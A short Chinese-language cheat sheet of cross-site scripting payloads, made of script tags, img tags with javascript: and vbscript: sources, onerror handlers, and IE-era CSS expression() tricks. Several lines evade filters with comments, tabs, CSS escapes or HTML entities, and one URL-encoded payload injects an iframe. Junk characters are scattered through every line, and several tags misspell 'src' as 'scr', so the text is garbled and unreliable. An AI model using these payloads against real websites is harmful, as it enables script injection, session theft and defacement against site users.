<script>alert("跨站")</script> (最常用). C4 q% i8 Q4 c* F8 X$ {5 y6 e
<img scr=javascript:alert("跨站")></img>
8 ?* q1 K: T/ @* G: M& \: U<img scr="javascript: alert(/跨站/)></img>0 |) T, G9 {( ~+ ?
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)' z- r6 S. x _- k
<img scr="#" onerror=alert(/跨站/)></img># ] L8 ?( ~% x
<img scr="#" style="xss:expression(alert(/xss/));"></img>4 A% ]6 S& Y& f
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
& w% ~1 K- U9 O2 C<img src=vbscript:msgbox ("xss")></img>& M! H! w/ m2 Y- h5 ?" D+ V
<style> input {left:expression (alert('xss'))}</style>
2 m& U& C* W/ m- ~/ v3 W<div style={left:expression (alert('xss'))}></div>
1 Z8 C3 S- n& e4 s! l! T# b<div style={left:exp/* */ression (alert('xss'))}></div>7 G, E& q u+ A! l3 n
<div style={left:\0065\0078ression (alert('xss'))}></div>. p0 a- A% t" a% M/ m3 H: E
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
# a6 s- o* M/ {$ iunicode <div style="{left:expRessioN (alert('xss'))}">
% `% ^, n; w0 o7 ~0 `
' Q) k, R3 D5 l! J* E"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
# f) _& g! f7 ?3 w" n |